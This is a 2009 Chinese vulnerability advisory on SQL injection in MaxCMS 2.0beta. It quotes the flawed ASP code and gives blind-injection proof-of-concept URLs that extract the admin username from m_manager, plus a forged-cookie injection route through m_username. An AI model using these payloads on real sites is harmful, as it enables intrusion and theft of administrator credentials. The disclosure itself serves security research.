马克斯CMS2.0beta (maxcms)SQL注入漏洞
作者:flyh4t 来源:wolvez.org 发布时间:2009-02-17 12:58:00
这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。
看代码
\inc\ajax.aspdim action : action = getForm("action", "get")response.Charset="gbk"Select case action case "newslist" : viewNewsList case "newscontent" : viewNewsContent case "digg","tread" : scoreVideo(action) case "reporterr" : reportErr case "hit" : updateHit case else : mainEnd SelectterminateAllObjects……Sub scoreVideo(operType) dim sql,id,digg,returnValue : id=getForm("id","get") ‘通过get方式获取id的值 if rCookie("maxcms2_score"&id)="ok" then die "havescore" if isNul(id) then die "err" 'on error resume next digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0) ‘ 参数id,没有过滤就带入sql语句进行查询 if err then digg=0 : err.clear() if not isNum(id) then echoSaveStr "safe" else id=clng(id) ‘ 查询到digg,注意返回的内容……
利用就很简单了,构造sql语句提交(默认结构是m_manager,m_username,m_pwd,根据返回的内容判断就可以了。如果构造的语句是正确的,就返回类似警告
你提交的数据有非法字符,你的IP【xxxx】已被记录,操作
构造的语句不正确,则返回500
Poc :
正确的:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97不正确的:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99
其实随便找个注射工具跑一下就ok了
另外一处注射
Sub checkPower dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute") loginValidate = md5(getAgent&getIp&rsObj(0)) if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>" if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>" checkManagerLevel rsObj(1) set rsObj=nothingEnd Sub
其中
Function rCookie(cookieName) rCookie = request.cookies(cookieName)End Function
通过伪造cookie中m_username的值可以进行注射
不过要知道后台管理目录,默认是/admin/,多个页面可以触发改函数
比如 /admin/admin_ajax.asp
猜你喜欢
- 新做了一个资料类的网站,因为女朋友从事的职业的关系,老是让我给她找资料,也发现了很多资料网站的问题,这里谈一下自己对资料网站的看法:1.既然
- 最近又开始玩PHP,研究起dedecms...这不正想搞搞导航站,想试试用dedecms这个内容管理系统实现其功能,终于早上配置好了php平
- 对于Exchange服务器的备份可以分成两个主要的目标。首先是对整个系统数据的备份。这一工作包括了对Windows操作系统的核心数据、服务器
- 下面教给Godaddy用户电子邮件转发的设置步骤:第一、登陆AccountManger.第二、在MyProducts部分,点击Email/E
- 相关性,是搜索引擎优化中的重点。但是对于相关性的搜索引擎工作原理,相信大部分的SEOER对于都缺乏了解。但是只需要我们主流搜索引擎技术的方向
- 一。相对大小的字号在英文页面中,固定字号被称为“ frozen font sizes”,使用固定大小
- MySQL5安装图解本文讨论的是Windows2003下安装MySQL5,请注意下载MySQL安装文件,下载地址:点此下载MySQL5.5.
- 从最近几天吵得热火的Blogbus的“自频道”,到早些时候Feedsky低调推出的“我的博客圈”,再到更早之前的Google Reader的
- 在局域网环境中,网管往往非常重视对Windows服务器硬盘中的用户数据文件的备份,而忽视了对Windows系统本身提供的各种服务的状态信息和
- 注意:此文为个人修改办法,非官方!请不要误会!你可以不使用本人提供的代码,如果你使用了本人提供的代码,我就认为你愿意自行担负可能造成的错误和
- 本文主要讲解WordPress邮件订阅按钮以及Feed订阅按钮添加方法,已经会的童鞋,请直接飘过。一、邮件订阅按钮添加方法本身就是从网上学到
- 日本著名3D GALGAME游戏厂商Illusion公司官方网站近日放出了一段其将在明年2月19日发售的最新作《真实的女朋友》(リアル彼女,
- 昨晚,Google公司全球副总裁兼中国区总裁李开复博士来到广东外语外贸大学,与在校大学生畅谈求学与人生规划。他从10年来中国大学生向他提的4
- 在 UCHome 家园,用户可以根据不同的兴趣创建不同的群组(例如:“3D动画片爱好者”之类的群组),群组可以使群组成员产生真实的交互,增加
- 10月31日消息,消息人士透露,思科和EMC将联手销售用于云计算服务的新款网络设备、计算机和存储系统。据国外媒体报道称,代号为&ld
- xingTemplate 是一个基于PHP的模板引擎,主要对于PHP程序的方面快速开发而设计。它可以通过简易快捷的模板语法编译为PHP文件,
- 看着Amazon,有时候我就想:创新难道就是要坚持不停的穷折腾? 也许是的。Amazon是家执着且运气很好的公司,生来就有“兼并”和“不务正
- 最近在弄一个网站的易用性评估项目,就我个人体会,总结下糟糕的网站用户体验基本上会产生六大感受:1、不安感:网站在流程方面应该让用户在每次点击
- 网聊时代,大家总是喜欢寻找更多的快乐,所以我们看到了火星文、看到了搞笑的聊天表情、看到了QQ闪字…。这些,都是我们网上网下生活的调剂。今天,
- 11月25消息,百度推出一款功能强大的智能手机输入法v1.0 Beta,其基于百度搜索技术的强大词库,内置百度搜索框,将上网搜索步骤减少至最